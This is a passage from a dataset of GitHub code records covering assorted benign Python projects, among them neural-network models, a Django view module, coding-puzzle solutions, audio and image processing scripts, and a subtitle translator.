height, width, n_classes):\n super(AuxiliaryPSPlayers, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n self.cbr = conv2DBatchNormRelu(\n in_channels=in_channels, out_channels=256, kernel_size=3, stride=1, padding=1, dilation=1, bias=False)\n self.dropout = nn.Dropout2d(p=0.1)\n self.classification = nn.Conv2d(\n in_channels=256, out_channels=n_classes, kernel_size=1, stride=1, padding=0)\n\n def forward(self, x):\n x = self.cbr(x)\n x = self.dropout(x)\n x = self.classification(x)\n output = F.interpolate(\n x, size=(self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n return output\n","repo_name":"YutaroOgawa/pytorch_advanced","sub_path":"3_semantic_segmentation/utils/pspnet.py","file_name":"pspnet.py","file_ext":"py","file_size_in_byte":10658,"program_lang":"python","lang":"en","doc_type":"code","stars":784,"dataset":"github-code","pt":"5"} +{"seq_id":"31137490961","text":"from keras.models import Model\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nfrom GCN.layer import *\nfrom GCN.loss import *\n\n\ndef GCN(hyper):\n num_atoms = hyper[\"num_atoms\"]\n num_features = hyper[\"num_features\"]\n units_conv = hyper[\"units_conv\"]\n units_dense = hyper[\"units_dense\"]\n num_layers = hyper[\"num_layers\"]\n std = hyper[\"data_std\"]\n loss = hyper[\"loss\"]\n task = hyper[\"task\"]\n\n atoms = Input(name='atom_inputs', shape=(num_atoms, num_features))\n adjms = Input(name='adjm_inputs', shape=(num_atoms, num_atoms))\n\n out = atoms\n for _ in range(num_layers):\n out = GCNGraphConv(units_conv, activation='relu')([out, adjms])\n\n out = GCNGraphGather(pooling='sum')(out)\n out = Dense(units_dense, activation='relu')(out)\n out = Dense(units_dense, activation='relu')(out)\n\n if task == \"regression\":\n out = Dense(1, activation='linear', name='output')(out)\n model = Model(inputs=[atoms, adjms], outputs=out)\n 
model.compile(optimizer=Adam(lr=0.001), loss=loss, metrics=[std_mae(std=std), std_rmse(std=std)])\n    elif task == \"binary\":\n        out = Dense(1, activation='sigmoid', name='output')(out)\n        model = Model(inputs=[atoms, adjms], outputs=out)\n        model.compile(optimizer=Adam(lr=0.001), loss=loss)\n    elif task == \"classification\":\n        out = Dense(1, activation='softmax', name='output')(out)\n        model = Model(inputs=[atoms, adjms], outputs=out)\n        model.compile(optimizer=Adam(lr=0.001), loss=loss)\n    else:\n        raise ValueError(\"Unsupported task on model generation.\")\n\n    return model\n","repo_name":"blackmints/molecular-parameters","sub_path":"GCN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"}
{"seq_id":"8865062900","text":"#!/usr/bin/env python\n# Name: Mark van Malestein\n# Student number: 10807640\n\nimport csv\nimport pandas as pd\nimport json\nimport pycountry\n\ndef parse_data():\n    # Doing a bit of preprocessing, otherwise I can't make a valid JSON\n    with open(\"dataset.csv\", \"r\", newline = \"\") as csvfile:\n        data = []\n        for row in csv.reader(csvfile, delimiter=\",\"):\n            if row:\n                row[0], row[3] = row[0], row[3]\n                data.append(row)\n        headers = data.pop(0)\n\n    df = pd.DataFrame.from_records(data, columns = headers)\n\n    return df\n\ndef add_codes(df):\n    \"\"\"\n    Adds ISO alpha-3 country codes to the dataframe\n    \"\"\"\n    # for i in list(pycountry.countries):\n    #     print(i)\n    # print(list(pycountry.countries)[0])\n    countries = df[\"Country\"]\n    abb_list = []\n    for country in countries:\n        country_name = pycountry.countries.get(name=country)\n        off_country_name = pycountry.countries.get(official_name=country)\n        if country_name:\n            abb_list.append(country_name.alpha_3)\n        elif off_country_name:\n            abb_list.append(off_country_name.alpha_3)\n        else:\n            abb_list.append(\"NaN\")\n\n    df = df.assign(Code=abb_list)\n    return df\n\n\ndef converting(df):\n    \"\"\"\n    Converts the dataframe to JSON format and writes it to a file\n    \"\"\"\n\n    # Write in file and let user know the name of the file\n    json = df.to_json(orient = \"records\")\n    with open(\"json.js\", \"w\") as file:\n        file.write(json)\n\n\nif __name__ == '__main__':\n    df = parse_data()\n    df = add_codes(df)\n    converting(df)\n","repo_name":"koffiehuis/Dataprocessing","sub_path":"Homework/Week_6/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"2049052315","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import ActivitiesForm\nfrom .models import activities\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom CAJL.aplications.activities.signals import create_change_log\n\n\n# Create your views here.\n# View: activities datatable\n@login_required\ndef activities_list(request):\n    activities_data = activities.objects.all()\n    \n    tipos_actividad = activities_data.values_list('tipo_actividad', flat=True).distinct()\n    \n    context = {\n        'activities_data': activities_data,\n        'tipos_actividad': tipos_actividad,\n    }\n    \n    return render(request, 'activities/activities_list.html', context)\n\n# View: edit an activity's data, preloading its current values\n@login_required\ndef detallesact(request, activities_id):\n    activity = get_object_or_404(activities, id=activities_id)\n    \n    if request.method == 'POST':\n        if 'editar' in request.POST:\n            form = ActivitiesForm(request.POST, instance=activity)\n            if form.is_valid():\n                updated_activity = form.save(commit=False)\n                updated_activity.user = request.user\n                updated_activity.save()\n                \n                messages.success(request, 'Los datos de la actividad han sido actualizados.')\n                return redirect('actividades')\n            else:\n                messages.error(request, 'Error al actualizar los datos de la actividad.')\n        elif 'eliminar' in request.POST:\n            \n            deleted_activity = activity\n            deleted_activity.user = request.user\n            \n            activity.delete()\n            \n\n            # create_change_log(sender=activities, instance=None, user=user, created=False, activity_id=activity_id)\n            messages.success(request, 'La actividad ha sido eliminada.')\n            return redirect('actividades')\n    else:\n        form = ActivitiesForm(instance=activity)\n    \n    return render(request, 'activities/detalles_actividades.html', {'form': form, 'activity': activity})\n\n# View: add a new activity\n@login_required\ndef agregar_actividad(request):\n    if request.method == 'POST':\n        # If a form was submitted (POST), process the data and save it to the database.\n        form = ActivitiesForm(request.POST)\n        if form.is_valid():\n            actividad = form.save(commit=False) # Save the instance without committing\n            actividad.user = request.user # Assign the current user\n\n            try:\n                actividad.save() # Now the instance can be saved with the user assigned\n\n                return redirect('actividades') # Redirect to the activities list page (adjust the URL to your configuration)\n            except Exception as e:\n                messages.error(request, f'Error al crear la actividad: {e}')\n    else:\n        # If no form was submitted (GET), show the form for adding an activity.\n        form = ActivitiesForm()\n\n    return render(request, 'activities/agregar_actividad.html', {'form': form})","repo_name":"OmarFranciscoAcosta/Club-Atletico-Juventud-De-Liniers","sub_path":"CAJL/aplications/activities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
{"seq_id":"29810465448","text":"import collections\n\nN = int(input())\nrecords = [list(map(int, input().split())) for _ in range(N)]\ncountry_medal = collections.defaultdict(int)\n\nrecords.sort(key=lambda x: -x[2])\n\nmedal = 0\nfor country, student, score in records:\n    if country_medal[country] < 2 and medal < 3:\n        country_medal[country] += 1\n        medal += 1\n        print(country, student)\n","repo_name":"zoolake/pythonPS","sub_path":"boj/2535.py","file_name":"2535.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"14680619716","text":"\n# Reverse a string \n\nch = 'Bonjour tout le monde'\ninverser_chaine_de_caratere = ''.join(reversed(ch))\nprint(f\"The reversed string is: {inverser_chaine_de_caratere}\")\n\n# another way to do it \n\n# ch[::-1]\n\n\n# join() method: result_string = separator.join(sequence)\n'''\n`separator` is the string of characters you want to insert between each element of the sequence.\n`sequence` is the sequence whose elements you want to join. \nIt can be a list, a tuple, or any other iterable sequence containing strings.\n'''","repo_name":"Saif-ALI96/formtion-tech-IA-python","sub_path":"exercis_pratique_python/exercis19.py","file_name":"exercis19.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"34546113604","text":"class Solution:\n    def maximalSquare(self, matrix: List[List[str]]) -> int:\n        row = len(matrix)\n        col = len(matrix[0])\n        sq = [[0 for _ in range(col)] for _ in range(row)]\n        m = 0\n        for i in range(row):\n            for j in range(col):\n                sq[i][j] = int(matrix[i][j])\n                m = max(m, sq[i][j])\n\n\n        for i in range(1, row):\n            for j in range(1, col):\n                if matrix[i][j] == \"1\" and matrix[i-1][j-1] ==\"1\" and matrix[i-1][j] ==\"1\" and matrix[i][j-1]==\"1\":\n                    sq[i][j] = min(sq[i-1][j-1], sq[i-1][j], sq[i][j-1]) + 1\n                    m = max(m, sq[i][j])\n        return m*m \n    \n    \n    \n    ","repo_name":"therealharish/Problem-Solving","sub_path":"leetcode/221. Maximal Square.py","file_name":"221. Maximal Square.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"12620803234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 29 14:16:58 2022\n\n@author: micha\n\"\"\"\n\nimport scipy\nimport librosa\nfrom scipy.io import wavfile\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy.io.wavfile import write\nfrom utils import *\nimport pdb\n\n# load wav files\nspeech, sr = librosa.load('clean.wav')\nadditive_noise, sr = librosa.load('noisy_white_3dB.wav')\n\n# create noise\nmean = 0\nstd = 1\nnum_samples = len(speech)\nadditive_noise = np.random.uniform(low=0.0, high=0.015, size=len(speech))\n\n# add together\nnoisy_sig = speech + additive_noise\n\n# TODO: remove\n# noisy_sig = noisy_sig[:1000]\nchannels = 16\nf1 = 250\nf2 = 8000\norder = 256\n\n# create channels\nchannels_sig = create_channels(channels, f1, f2, sr, order, noisy_sig)\nnoisy_envelope = env_detect(channels_sig)\n\n# remove zeros from beginning - maybe change the lpf delay\n# TODO: remove?\nnoisy_envelope = noisy_envelope[1000:, :]\n# transpose to fit equations from paper\nnoisy_envelope = np.transpose(noisy_envelope)\n\n# create noise envelope\nnoise_track_channels = create_channels(channels, f1, f2, sr, order, additive_noise)\nnoise_track_env = env_detect(noise_track_channels)\nnoise_track_env = noise_track_env[1000:, :]\nnoise_track_env = noise_track_env.transpose()\n\nx_after_weights = np.zeros([channels, np.size(noisy_envelope, 1)])\nweights = np.zeros([channels, np.size(noisy_envelope, 1)])\nxi_vals = np.zeros([channels, np.size(noisy_envelope, 1)])\ngamma_vals = np.zeros([channels, np.size(noisy_envelope, 1)])\n\nfor i in range(0, channels):\n    # first iteration: l = 0\n    prev_x = noisy_envelope[i, 0]\n    prev_n = noise_track_env[i, 0]\n    # TODO: ask about n:\n    n = noise_track_env[i, 0]\n    y = noisy_envelope[i, 0]\n    xi, gamma = estimated_instantaneous_snr(prev_x, i, y, prev_n, n)\n    g = weighing_function(xi)\n    x = enhanced_signal_envelope(g, y)\n\n    for l in range(1, np.size(noisy_envelope, 1)):\n        # update iteration\n        prev_x = x\n        prev_n = n\n        n = noise_track_env[i, l]\n        y = noisy_envelope[i, l]\n        xi, gamma = estimated_instantaneous_snr(prev_x, i, y, prev_n, n)\n\n        g = weighing_function(xi)\n        x = enhanced_signal_envelope(g, y)\n\n        x_after_weights[i, l] = x\n\n        # save values for testing\n        weights[i, l] = g\n        
xi_vals[i, l] = xi\n gamma_vals[i, l] = gamma\n\nlpf_x = np.zeros([channels, np.size(x_after_weights, 1)])\n\nfor i in range(0, channels):\n lpf_x[i, :] = butterworth_filter(filter_freq=200,\n sr=sr,\n filter_order=6,\n filter_type='low',\n sig_to_filter=x_after_weights[i, :]\n )\n\"\"\"\"\"\nfrom scipy import fftpack\n\nx = x_after_weights.flatten()\n# x = noisy_sig\nf_s = 22050\nX = fftpack.fft(x)\nfreqs = fftpack.fftfreq(len(x)) * f_s\n\nfig, ax = plt.subplots()\n\nplt.plot(freqs, np.abs(X))\n\"\"\"\"\"\n# reconstruct to 1D array\n\nfinal_signal = np.sum(lpf_x, axis=0)\nplt.plot(final_signal)\nplt.show()\nscipy.io.wavfile.write('final signal.wav', sr, final_signal*3)\nscipy.io.wavfile.write('noisy signal.wav', sr, noisy_sig)\nscipy.io.wavfile.write('noisy envelope.wav', sr, noisy_envelope.flatten()*5)\nscipy.io.wavfile.write('x_after_weights.wav', sr, np.sum(x_after_weights,axis=0)*5)","repo_name":"michalevin25/SigmoidAttenuationVocoder","sub_path":"sigmoiv_v2.py","file_name":"sigmoiv_v2.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43820676871","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\ndef equalizeHistogram(image, max_hist_val = 200):\n '''\n Input: \n image: Grayscale input image\n max_hist_val: The maximum value of pixel intesity to be considered by histogram, to compensate for the domination of \n higher intensity value(white background)\n\n Output: The returned image's pixel distribution upto max_hist_val pixel is equalized \n '''\n hist, bins = np.histogram(image.flatten(), max_hist_val, [0,max_hist_val])\n\n cdf = hist.cumsum()\n cdf_normalized = cdf * float(hist.max()) / cdf.max()\n\n cdf_m = np.ma.masked_equal(cdf,0)\n cdf_m = (cdf_m - cdf_m.min())*max_hist_val/(cdf_m.max()-cdf_m.min())\n cdf = np.ma.filled(cdf_m,0).astype('uint8')\n\n white_ar = 255 * np.ones((256-max_hist_val,)) \n white_ar = white_ar.astype('uint8')\n\n cdf = np.append(cdf, white_ar)\n img_ret = cdf[image]\n # print(cdf)\n # print(cdf.shape)\n\n return img_ret\n\nif __name__ == '__main__':\n image_loc = 'images/Pulley_Ex2.png'\n img = cv2.imread(image_loc)\n median_blur = cv2.medianBlur(img, 11)\n gray_mb = cv2.cvtColor(median_blur, cv2.COLOR_BGR2GRAY)\n\n custom = equalizeHistogram(gray_mb)\n inbuilt = cv2.equalizeHist(gray_mb)\n\n cv2.imshow('Orig', gray_mb)\n cv2.imshow('Custom', custom)\n cv2.imshow('Inbuilt', inbuilt)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"Piyush-Kumar-Behera/AtwoodSolver","sub_path":"histogram_equalization.py","file_name":"histogram_equalization.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11254665221","text":"from mlagents_envs.side_channel.side_channel import (\n SideChannel,\n IncomingMessage,\n OutgoingMessage,\n)\nimport uuid\n\nclass StatisticalSideChannel(SideChannel):\n def __init__(self):\n super().__init__(uuid.UUID(\"ad041eb0-4a51-451f-a363-bb3a1a5d47bc\"))\n self.agent_win_count = 0\n self.opponent_win_count = 0\n\n def on_message_received(self, msg: IncomingMessage):\n msg_list = msg.read_float32_list()\n self.agent_win_count = msg_list[0]\n self.opponent_win_count = msg_list[1]\n\n def send_string(self, data: str):\n msg = OutgoingMessage()\n msg.write_string(data)\n 
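# ML-Agents sends queued side channel messages to Unity with the next simulation step\n        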
super().queue_message_to_send(msg)","repo_name":"sansansan-333/mlagents-DQN","sub_path":"statisticsSideChannel.py","file_name":"statisticsSideChannel.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24876655743","text":"__copyright__ = \"\"\"\nCopyright (C) 2022 Kaushik Kulkarni\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport ast\n\nfrom typing import Union, Optional, Mapping\n\nfrom pytato.array import Array, DictOfNamedArrays\nfrom pytato.target.python import JAXPythonTarget, BoundJAXPythonProgram\nfrom pytato.target.python.numpy_like import generate_numpy_like\n\n__doc__ = \"\"\"\n.. autofunction:: generate_jax\n\"\"\"\n\n\ndef generate_jax(expr: Union[Array, Mapping[str, Array], DictOfNamedArrays],\n *,\n target: Optional[JAXPythonTarget] = None,\n jit: bool = False,\n function_name: str = \"_pt_kernel\",\n show_code: bool = False,\n colorize_show_code: bool = True,\n ) -> BoundJAXPythonProgram:\n \"\"\"\n Returns a :class:`pytato.target.python.BoundJAXPythonProgram` for the array\n expressions in *expr*.\n\n :arg jit: If *True*, the generated function is decorated with\n :func:`jax.jit`.\n :arg function: Name of the entrypoint function in the generated code.\n :arg show_code: If *True*, the generated code is printed to ``stdout``.\n \"\"\"\n if target is None:\n target = JAXPythonTarget()\n\n extra_preambles = []\n decorators = []\n\n if jit:\n extra_preambles.append(ast.ImportFrom(module=\"jax\",\n names=[ast.alias(\n \"jit\",\n asname=\"_pt_jax_jit\")],\n level=0))\n decorators.append(\"_pt_jax_jit\")\n\n return generate_numpy_like(expr, target=target, # type: ignore[return-value]\n function_name=function_name,\n show_code=show_code,\n extra_preambles=tuple(extra_preambles),\n entrypoint_decorators=tuple(decorators),\n colorize_show_code=colorize_show_code)\n","repo_name":"inducer/pytato","sub_path":"pytato/target/python/jax.py","file_name":"jax.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"40465555638","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nimport pandas as pd\nimport subprocess\n\ndef visualize_tree(tree, feature_names):\n\n with open(\"visual.dot\", 'w') as f:\n export_graphviz(tree, out_file=f, feature_names=feature_names)\n try:\n subprocess.check_call([\"dot\", \"-Tpng\", \"visual.dot\", 
\"-o\", \"visual.png\"])\n except:\n exit(\"Failed to generate a visual graph\")\n\n\ndef get_weather_data():\n data = pd.read_csv(\"weather_data.csv\")\n # print(data.head())\n return data\n\n\ndef preprocess(data, target_column):\n \"\"\"returns cleaned dataframe and targets\"\"\"\n data_clean = data.copy()\n targets = data_clean[target_column].unique()\n map_str_to_int = {name: n for n, name in enumerate(targets)}\n data_clean[\"Target\"] = data_clean[target_column].replace(map_str_to_int)\n\n return (data_clean, targets)\n\ndef display_labels(targets):\n print(\"0 :\",targets[0])\n print(\"1 :\",targets[1])\n print(\"2 :\",targets[2])\n print(\"3 :\",targets[3])\n\ndef train_classifier(train_data, train_target):\n \"\"\"returns a new model that can be used to make predictions\"\"\"\n # create a decision tree classifier\n wclf = DecisionTreeClassifier(min_samples_split=20, random_state=99)\n # train it on the training data / train classifier\n wclf.fit(train_data, train_target)\n\n return wclf\n\ndef ml():\n # gather the data set\n data = get_weather_data()\n # print(data.head())\n\n # encode the weather description to an integer. \n pp_data, targets = preprocess(data, \"Weather Description\")\n\n # just for visualization\n print(\"\\n* targets *\\n\", targets, end=\"\\n\\n\")\n features = list(pp_data.columns[:5])\n print(\"* features *\\n\", features, end=\"\\n\\n\")\n print(\"=======preprocessed data=======\\n\")\n print(\"------------first five rows------------\")\n print(\"* pp_data.head()\", pp_data[[\"Target\", \"Weather Description\"]].head(), sep=\"\\n\", end=\"\\n\\n\")\n print(\"------------last five rows------------\")\n print(\"* pp_data.head()\", pp_data[[\"Target\", \"Weather Description\"]].tail(), sep=\"\\n\", end=\"\\n\\n\")\n \n \n p_target = pp_data[\"Target\"]\n p_features = pp_data[features]\n\n # taking some data out of the dataset for testing\n items = [6,132,431,32]\n test_target = p_target.loc[items]\n test_data = p_features.loc[items]\n\n display_labels(targets)\n\n print(\"---Test Data's Target Value---\")\n print(\"Row \",\"Target\")\n print(test_target)\n\n # preparing data for training by removing test data\n train_target = p_target.drop(items)\n train_data = p_features.drop(items)\n \n wclf = train_classifier(train_data, train_target)\n\n visualize_tree(wclf, features)\n prediction = wclf.predict(test_data)\n print(\"\\n---Actual Prediction---\")\n print(prediction)\n\n\nif __name__==\"__main__\":\n ml()","repo_name":"Joy57/Storm-Prediction-ML","sub_path":"pi_storm.py","file_name":"pi_storm.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27607226328","text":"from turtle import Turtle\nfrom random import choice, randint\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 0.1\nMOVE_INCREMENT = 0.2\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.number_of_cars = 20\n self.speed = STARTING_MOVE_DISTANCE\n for _ in range(self.number_of_cars):\n self.create_car()\n\n def manage_cars(self):\n for car in self.cars:\n if car.xcor() < -300:\n self.cars.remove(car)\n car.hideturtle()\n del car\n self.create_car()\n\n def increase_cars(self):\n self.create_car()\n\n def increase_speed(self):\n self.speed += MOVE_INCREMENT\n\n def create_car(self):\n new_car = Turtle(\"square\")\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.penup()\n new_car.setheading(-90)\n 
new_car.color(choice(COLORS))\n new_car.goto(randint(300, 1000), randint(-250, 250))\n self.cars.append(new_car)\n\n def move_cars(self):\n for car in self.cars:\n car.forward(self.speed)\n","repo_name":"ahsan2882/100-days-of-python-pro","sub_path":"day-023-turtle-crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22387894832","text":"# pip 업그레이드하기 => /usr/bin/python3 -m pip install --upgrade pip\n# 구글 번역 API 다운로드 하기 => pip3 install google_trans_new\n# requests 패키지도 필요함\n# 구글 번역 라이브러리는 Python >=3.6 에서 동작함\n\n# 주의사항 : 캡션을 달때는 무조건 한줄로 작성하기 => 아니면 캡션 다운로드한 다음에 한줄로 변경하기\n\n# 파이썬 버전을 업그레이드하면 google_trans_new 를 인식 못할수 있음 => 커맨드창에서 파이썬 버전을 변경해줘야함 py -3.91 youtube-translator-caption.py\n# 파이썬 3.9.1에서는 모듈을 인식하지만 3.9.6에서는 인식하지 못함\n\n# json.decoder.JSONDecodeError: Extra data \n# C:\\Users\\이성용\\AppData\\Local\\Programs\\Python\\Python39\\Lib\\site-packages\\google_trans_new 폴더 내에 google_trans_new.py 151 행 코드 변경하기\n# (decoded_line + ']') 를 decoded_line 으로 변경하기\n# python youtube-translator-caption.py 로 실행하면 됨\n\nimport os\nfrom google_trans_new import google_translator # 문제가 좀 있음\n\n# directory_to_save_captions = '/home/sylee/dev/utility/youtube-translator/captions/' # 자막을 저장할 폴더 위치 => PC마다 변경해줘야 함\ndirectory_to_save_captions = 'C:\\youtube-translator\\\\captions\\\\'\n\n# 자막 파일들을 담을 폴더 생성하기\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n \ncreateFolder(directory_to_save_captions)\n\n\nfilename = 'captions.srt' # 유튜브 영상에서 다운받은 자막파일 이름\nsrc_lang = 'en'\ntgt_lang_array = ['en', 'zh-cn', 'zh-tw', 'hi', 'ru',\n 'ja', 'de', 'th', 'id', 'ms', 'vi', 'tl',\n 'fi', 'fr', 'pl', 'pt', 'es', 'tr', 'it',\n 'uk', 'da', 'no', 'nl', 'sv', 'he'\n ]\n\nlang_codes = {\n 'en' : '영어',\n 'zh-cn': '중국어(간체)',\n 'zh-tw' : '중국어(번체)',\n 'hi' : '힌디어',\n 'ru': '러시아어',\n 'ja' : \t'일본어',\n 'de': '독일어',\n 'th': '태국어',\n 'id' : '인도네시아어',\n 'ms': '말레이어',\n 'vi' : '베트남어',\n 'tl' : '필리핀어',\n 'fi' : '핀란드어',\n 'fr': '프랑스어',\n 'pl': '폴란드어',\n 'pt': '포르투칼어',\n 'es': '스페인어',\n 'tr': '터키어',\n 'it': '이탈리아어',\n 'uk': '우크라이나어',\n 'da' : \t'덴마크어',\n 'no': '노르웨이어',\n 'nl': '네덜란드어',\n 'sv': '스웨던어',\n 'he': '히브리어'\n}\n\ntranslator = google_translator() \n\ndef translate_and_save_into_file(filename, tgt_lang):\n # 파일 전체 읽어서 lines 배열에 저장하기\n f = open(filename, \"r\" , encoding='UTF8')\n lines = f.readlines()\n\n # 라인마다 순회하면서 한글이 있는 줄만 번역한 다음 lines 배열에 업데이트하기\n for i, line in enumerate(lines):\n if (i-2) % 4 == 0: \n # print(lines[i])\n translate_text = translator.translate(lines[i],lang_src=src_lang, lang_tgt=tgt_lang) \n print(translate_text)\n lines[i] = translate_text + \"\\n\" # 원래 다운로드한 자막파일에 자막마다 한줄 띄워쓰기가 있어서 반드시 \"\\n\" 있어야 함\n\n # 변경된 lines 배열을 다시 파일에 쓰기\n f = open(\"{}captions_{}.srt\".format(directory_to_save_captions, lang_codes[tgt_lang]), \"w\", encoding='UTF8')\n f.writelines(lines)\n f.close()\n\n# 번역할 언어 갯수만큼 순회하면서 번역하고 파일 저장함\nfor i in range(len(tgt_lang_array)):\n translate_and_save_into_file(filename, tgt_lang_array[i])\n print(\"---------------------------------------------------------------\")\n\n\n\n# google trans new 코드 ########################\n############### 변경할 언어 코드 ################\n# 영어 : en\n# 중국어(간체): zh-cn\n# 중국어(번체) : zh-tw\n# 힌디어 : hi\n# 러시아어: ru\n# 일본어 : \tja\n# 독일어: de\n# 태국어: th\n# 인도네시아어 : id\n# 말레이어: ms\n# 베트남어 : vi\n# 필리핀어 : tl\n# 핀란드어 : 
# Loop over every target language, translating and saving a file for each\nfor i in range(len(tgt_lang_array)):\n    translate_and_save_into_file(filename, tgt_lang_array[i])\n    print(\"---------------------------------------------------------------\")\n\n\n\n# google trans new codes ########################\n############### target language codes ################\n# English : en\n# Chinese (Simplified): zh-cn\n# Chinese (Traditional) : zh-tw\n# Hindi : hi\n# Russian: ru\n# Japanese : \tja\n# German: de\n# Thai: th\n# Indonesian : id\n# Malay: ms\n# Vietnamese : vi\n# Filipino : tl\n# Finnish : fi\n# French: fr\n# Polish: pl\n# Portuguese: pt\n# Spanish: es\n# Turkish: tr\n# Italian: it\n# Ukrainian: uk\n# Danish : \tda\n# Norwegian: no\n# Dutch: nl\n# Swedish: sv\n# Hebrew: he\n############################################","repo_name":"sssssqew/youtube-translator-upgrade","sub_path":"youtube-translator-caption.py","file_name":"youtube-translator-caption.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31546666956","text":"from os import rename\nimport copy as c\n\nclass tr :\n    def transport(n) :\n        #n = \"2b\"\n        res = []\n        n = list(n)\n        for i in n :\n\n            if i.isalpha() : i = tr.str_int(i)\n            else : i = int(i)\n\n            temp = list(bin(i))\n            temp.pop(0)\n            temp.pop(0)\n            temp = tr.FillUp0(\"\".join(temp))\n            temp = tr.str_int(\"\".join(temp))\n\n            res.append(temp) \n            #print(\"tr transport temp :\",temp)\n        return \"\".join(res)\n\n    def list_chunk(lst, n):\n        return [lst[i:i+n] for i in range(0, len(lst), n)]\n\n    def retransport(s) :\n        if type(s) == type([]) :\n            s = \"\".join(s)\n        #s = \"0001\"\n\n        s = tr.list_chunk(list(tr.FillUp0(str(s))),4)\n        #print(\"retransport s :\",s)\n        r = []\n        for j in range(len(s)) :\n            t = 0\n            for i in range(len(s[j])) :\n                #print(\"len(s[j])-i-1 :\",len(s[j])-i-1)\n                #print(\"(2**(len(s[j])-i-1)) :\",(2**(len(s[j])-i-1)))\n                #print(\"(int(s[j][i])) :\",(int(s[j][i])))\n                #print(\"t += :\",(2**(len(s[j])-i-1))*(int(s[j][i])))\n                t += ((2**(len(s[j])-i-1))*(int(s[j][i])))\n            #print(\"\\n\")\n            r.append(str(tr.str_int(t)))\n        #print(\"\\n\")\n        \n\n        return \"\".join(r)\n    \n    \n\n    def str_int(s) :\n        if s == \"a\" : return 10\n        elif s == \"b\" : return 11\n        elif s == \"c\" : return 12\n        elif s == \"d\" : return 13\n        elif s == \"e\" : return 14\n        elif s == \"f\" : return 15\n        elif s == \"A\" : return 10\n        elif s == \"B\" : return 11\n        elif s == \"C\" : return 12\n        elif s == \"D\" : return 13\n        elif s == \"E\" : return 14\n        elif s == \"F\" : return 15\n        elif s == \"10\" : return \"a\"\n        elif s == \"11\" : return \"b\"\n        elif s == \"12\" : return \"c\"\n        elif s == \"13\" : return \"d\"\n        elif s == \"14\" : return \"e\"\n        elif s == \"15\" : return \"f\"\n        elif s == 10 : return \"a\"\n        elif s == 11 : return \"b\"\n        elif s == 12 : return \"c\"\n        elif s == 13 : return \"d\"\n        elif s == 14 : return \"e\"\n        elif s == 15 : return \"f\"\n        else : return s\n\n    def FillUp0(i,byte=4) :\n        #i = 10\n        i = list(i)\n        while True :\n            if len(i) < byte :\n                i.insert(0,\"0\")\n            else :\n                break\n        return \"\".join(i)\n\n    def XorOnStr(s1,s2) :\n        s1 = list(str(s1))\n        s2 = list(str(s2))\n        res = []\n        for i in 